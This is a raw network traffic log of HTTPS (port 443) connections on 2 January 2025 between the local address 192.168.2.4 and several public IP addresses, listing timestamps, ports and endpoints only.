Jan 2, 2025 17:21:35.835392952 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:35.835438967 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:35.835674047 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:35.835686922 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:35.835921049 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:35.835933924 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.499202967 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.499557972 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.499578953 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.500668049 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.500757933 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.500765085 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.500854969 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.503953934 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.504257917 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.504291058 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.505330086 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.505455971 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.505460978 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.505464077 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.505508900 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.505536079 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.505815983 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.505882025 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.506117105 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.506124020 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.560170889 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.560175896 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.560203075 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.607446909 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.686363935 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.686427116 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.686501026 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.686521053 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.686597109 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.687414885 CET	49741	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:36.687433958 CET	443	49741	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:36.734596968 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:36.734711885 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:36.735261917 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:36.735789061 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:36.735820055 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:37.558898926 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:37.601417065 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:37.665819883 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:37.665848970 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:37.667097092 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:37.667152882 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:37.870788097 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:37.870995045 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:37.874852896 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:37.874874115 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:37.916382074 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:38.526232004 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.526256084 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.526266098 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.526295900 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.526318073 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:38.526333094 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.526359081 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:38.531187057 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.531219959 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.531229973 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.531251907 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:38.531255960 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.531280041 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.531294107 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:38.531317949 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:38.538424969 CET	49742	443	192.168.2.4	143.204.215.95
Jan 2, 2025 17:21:38.538445950 CET	443	49742	143.204.215.95	192.168.2.4
Jan 2, 2025 17:21:38.583570004 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:38.583599091 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:38.583657980 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:38.583872080 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:38.583889961 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:38.834645033 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:38.834719896 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:38.834805012 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:38.835105896 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:38.835125923 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.573088884 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.573400974 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.573427916 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.574342966 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.574506044 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.574711084 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.574771881 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.574875116 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.574884892 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.601255894 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.601512909 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.601537943 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.602504969 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.602564096 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.603698015 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.603758097 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.604132891 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.604140997 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.619519949 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.650846004 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.749409914 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.749434948 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.749442101 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.749669075 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.749690056 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.776984930 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.777045012 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.777149916 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.777149916 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.777394056 CET	49744	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:39.777406931 CET	443	49744	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:39.873056889 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.873078108 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.873084068 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.873096943 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.873122931 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.873157978 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.873187065 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.873199940 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.873229027 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.876662970 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.876729012 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.876729965 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:39.876773119 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.882185936 CET	49743	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:39.882199049 CET	443	49743	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:40.033786058 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.033842087 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.033910990 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.034059048 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.034158945 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.034224987 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.034298897 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.034312010 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.034462929 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.034501076 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.645560980 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.645848036 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.645874023 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.646878958 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.646946907 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.647448063 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.647509098 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.647602081 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.647610903 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.652944088 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.653156996 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.653186083 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.654102087 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.654150009 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.654527903 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.654587030 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.697364092 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.697403908 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.697417974 CET	443	49745	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.744136095 CET	49745	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.796783924 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.796804905 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.796811104 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.796892881 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.796915054 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.825488091 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.825562000 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.825577021 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.825589895 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:40.825645924 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.825997114 CET	49746	443	192.168.2.4	67.227.180.41
Jan 2, 2025 17:21:40.826011896 CET	443	49746	67.227.180.41	192.168.2.4
Jan 2, 2025 17:21:44.552654028 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:44.552719116 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:44.553179026 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:46.235970020 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:46.236001015 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:51.068111897 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.068162918 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.068233013 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.068505049 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.068521976 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.069732904 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.069766998 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.069839001 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.070080996 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.070094109 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.530616999 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.531079054 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.531095028 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.532083035 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.532140970 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.534487963 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.534559011 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.534698963 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.535103083 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.535132885 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.535307884 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.535322905 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.536114931 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.536175013 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.537594080 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.537674904 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.589641094 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.589642048 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:51.589660883 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:51.637442112 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.259776115 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.260529995 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.260561943 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.260582924 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.260584116 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.260598898 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.260634899 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.260901928 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.260931015 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.260948896 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.260953903 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.260993004 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.260997057 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.261039019 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.261085987 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.261473894 CET	49754	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.261488914 CET	443	49754	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.279800892 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.304316998 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:52.304372072 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:52.304433107 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:52.304666042 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:52.304687023 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:52.309215069 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:52.309238911 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:52.309294939 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:52.309477091 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:52.309490919 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:52.327326059 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.406083107 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:52.406100988 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:52.406172991 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:52.406364918 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:52.406390905 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:52.550674915 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.550725937 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.550759077 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.550770998 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.550808907 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.550843000 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.550853014 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.550864935 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.550916910 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.550929070 CET	443	49753	172.66.0.235	192.168.2.4
Jan 2, 2025 17:21:52.552773952 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:52.552812099 CET	49753	443	192.168.2.4	172.66.0.235
Jan 2, 2025 17:21:53.017656088 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.032510042 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.070271015 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.086484909 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.118154049 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.118166924 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.118558884 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.118567944 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.119321108 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.119334936 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.119376898 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.121869087 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.121886969 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.121944904 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.167588949 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.206439972 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.240725040 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.241012096 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.242300987 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.242311001 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.243355036 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.243423939 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.246421099 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.246634007 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.247153997 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.247216940 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.247328043 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.247344971 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.247642994 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.247657061 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.247713089 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.247728109 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.293411970 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.293411970 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.293421984 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.369061947 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369182110 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369235992 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.369244099 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369354010 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369409084 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.369415998 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369510889 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369565964 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.369571924 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369684935 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369729042 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.369735003 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369832039 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.369878054 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.369884968 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.373559952 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.373635054 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.373641968 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.416369915 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.462872982 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.463087082 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.463146925 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.463907003 CET	49756	443	192.168.2.4	104.23.139.12
Jan 2, 2025 17:21:53.463920116 CET	443	49756	104.23.139.12	192.168.2.4
Jan 2, 2025 17:21:53.479825020 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.495191097 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:53.495223999 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:53.495301962 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:53.495621920 CET	49759	443	192.168.2.4	104.23.140.12
Jan 2, 2025 17:21:53.495635033 CET	443	49759	104.23.140.12	192.168.2.4
Jan 2, 2025 17:21:53.495976925 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.495985031 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.496028900 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.496043921 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.496054888 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.496064901 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.496073008 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.496085882 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.496098995 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.496119976 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.500097036 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.500145912 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.500153065 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.500165939 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.500215054 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.500965118 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.500977039 CET	443	49755	143.204.215.112	192.168.2.4
Jan 2, 2025 17:21:53.501010895 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.501030922 CET	49755	443	192.168.2.4	143.204.215.112
Jan 2, 2025 17:21:53.504502058 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504542112 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504570007 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504585981 CET	49758	443	192.168.2.4	162.159.140.237
Jan 2, 2025 17:21:53.504595041 CET	443	49758	162.159.140.237	192.168.2.4
Jan 2, 2025 17:21:53.504621983 CET	443	49758	162.159.140.237	192.168.2.4
